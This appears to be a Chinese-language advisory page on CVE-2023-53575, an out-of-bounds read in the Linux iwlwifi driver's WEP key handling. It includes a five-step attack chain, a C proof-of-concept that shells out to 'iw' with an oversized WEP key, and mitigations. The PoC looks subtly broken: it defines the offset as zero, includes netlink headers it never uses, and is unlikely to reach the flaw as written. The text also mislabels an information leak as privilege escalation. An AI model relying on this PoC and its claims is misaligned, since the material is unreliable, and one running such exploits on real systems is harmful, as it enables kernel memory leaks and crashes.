CVE-2023-53575 Linux内核iwlwifi驱动数组越界访问漏洞

漏洞信息

漏洞编号

CVE-2023-53575

漏洞类型

数组越界访问（Out-of-Bounds Read）

CVSS评分

7.1 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel（iwlwifi无线网卡驱动模块）

漏洞概述

CVE-2023-53575是Linux内核中iwlwifi（Intel无线网卡）驱动模块中的一个高危安全漏洞。该漏洞位于iwl_mvm_sec_key_add()函数中，在验证WEP密钥长度（key_len）时未正确考虑IWL_SEC_WEP_KEY_OFFSET偏移量，可能导致数组越界访问。攻击者可以利用此漏洞读取超出缓冲区边界的内存数据，从而获取敏感信息。由于该漏洞为本地权限提升类漏洞，攻击者需要先获得系统的低权限访问权限，但无需用户交互即可利用，成功利用后可能导致系统高机密性数据泄露及可用性丧失（如系统崩溃）。该漏洞的CVSS 3.1评分为7.1分，属于高危级别，主要影响使用Intel无线网卡并启用WEP加密的Linux系统。该漏洞已在Linux内核稳定版中通过提交133b1cd4d98bb8b272335c8e6b0e0c399c0b2ffa和637452360ecde9ac972d19416e9606529576b302进行修复。

技术细节

该漏洞的根本原因在于iwl_mvm_sec_key_add()函数中对WEP密钥长度的验证逻辑存在缺陷。具体而言，当验证key_len参数大小时，函数没有正确地考虑IWL_SEC_WEP_KEY_OFFSET宏定义的偏移量。在WEP密钥处理流程中，实际可用的密钥数据是从key_len中减去偏移量后得到的，但由于代码缺少对这一偏移量的正确处理，可能导致在数组索引计算时使用未经调整的长度值。

从技术实现角度看，iwlwifi驱动在处理无线网络安全配置时，会调用iwl_mvm_sec_key_add()来添加安全密钥。当用户空间通过nl80211接口配置WEP密钥时，传入的key_len参数如果未经过适当的边界检查，驱动内部可能使用该值直接访问固定大小的内部缓冲区（如keybuf数组），从而触发越界读取。

利用方式方面，攻击者首先需要拥有本地系统的低权限账户（PR:L），然后通过修改无线网络配置或使用特定的netlink消息，向iwlwifi驱动发送精心构造的WEP密钥参数。由于漏洞触发无需用户交互（UI:N），攻击者可以通过脚本或程序自动化完成利用。成功利用后，攻击者可以读取内核内存中的敏感数据（如相邻内存区域的内容），并可能触发内核崩溃（kernel panic），导致系统拒绝服务（DoS）。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者通过常规手段获取目标Linux系统的本地低权限账户访问权限，例如通过弱口令、钓鱼或其他已存在漏洞获得初始立足点。

STEP 2

步骤2：识别目标环境

攻击者确认目标系统使用Intel无线网卡（通过lspci或iw dev命令检查），且Linux内核版本存在iwlwifi驱动中的漏洞。

STEP 3

步骤3：构造恶意WEP密钥配置

攻击者通过nl80211 netlink接口或iw命令行工具，向iwlwifi驱动发送精心构造的WEP密钥参数，其中key_len值未正确考虑IWL_SEC_WEP_KEY_OFFSET偏移量。

STEP 4

步骤4：触发数组越界访问

iwl_mvm_sec_key_add()函数在处理恶意配置时，由于缺少对偏移量的正确处理，使用未经调整的key_len访问内部缓冲区，触发越界读取。

STEP 5

步骤5：信息泄露或拒绝服务

越界读取使攻击者能够读取内核内存中的敏感数据，或触发内核崩溃导致系统不可用，实现高机密性影响和高可用性影响。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/* CVE-2023-53575 PoC - iwlwifi WEP key array OOB read
 * Trigger array out-of-bounds access in iwl_mvm_sec_key_add()
 * by sending a crafted WEP key configuration via nl80211.
 *
 * Note: Requires local low-privilege access and an Intel wireless NIC.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/nl80211.h>

#define IWL_SEC_WEP_KEY_OFFSET 0

static int trigger_oob_read(const char *ifname) {
    /* Simplified PoC: use iw/nl80211 to set a WEP key with
     * abnormal key_len that bypasses the missing offset check.
     *
     * The vulnerable code path:
     *   iwl_mvm_sec_key_add() -> key validation without
     *   accounting for IWL_SEC_WEP_KEY_OFFSET
     */
    char cmd[512];
    /* Craft a WEP key with length that triggers OOB when offset is not subtracted */
    snprintf(cmd, sizeof(cmd),
        "iw dev %s key d:0 %s 2>/dev/null",
        ifname,
        "4141414141414141414141414141414141414141414141414141414141414141");
    printf("[*] Executing: %s\n", cmd);
    int ret = system(cmd);
    /* If kernel is vulnerable, this may trigger OOB read and crash */
    return ret;
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        fprintf(stderr, "Usage: %s <wireless_interface>\n", argv[0]);
        fprintf(stderr, "Example: %s wlan0\n", argv[0]);
        return 1;
    }
    printf("[*] CVE-2023-53575 PoC - iwlwifi WEP key OOB read\n");
    printf("[*] Target interface: %s\n", argv[1]);
    return trigger_oob_read(argv[1]);
}

影响范围

Linux Kernel < 6.6（修复提交133b1cd4d98bb8b272335c8e6b0e0c399c0b2ffa之前的版本）

Linux Kernel稳定分支（修复提交637452360ecde9ac972d19416e9606529576b302之前的版本）

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）禁用WEP加密认证，强制使用WPA2/WPA3等更安全的加密协议；2）通过iptables或AppArmor限制普通用户对netlink套接字的访问权限；3）监控系统稳定性，如发现内核oops或panic信息，及时排查是否为该漏洞触发；4）限制本地用户对无线网络配置工具（如iw、wpa_supplicant）的执行权限；5）密切关注Linux内核安全公告，在评估兼容性后尽快应用官方补丁。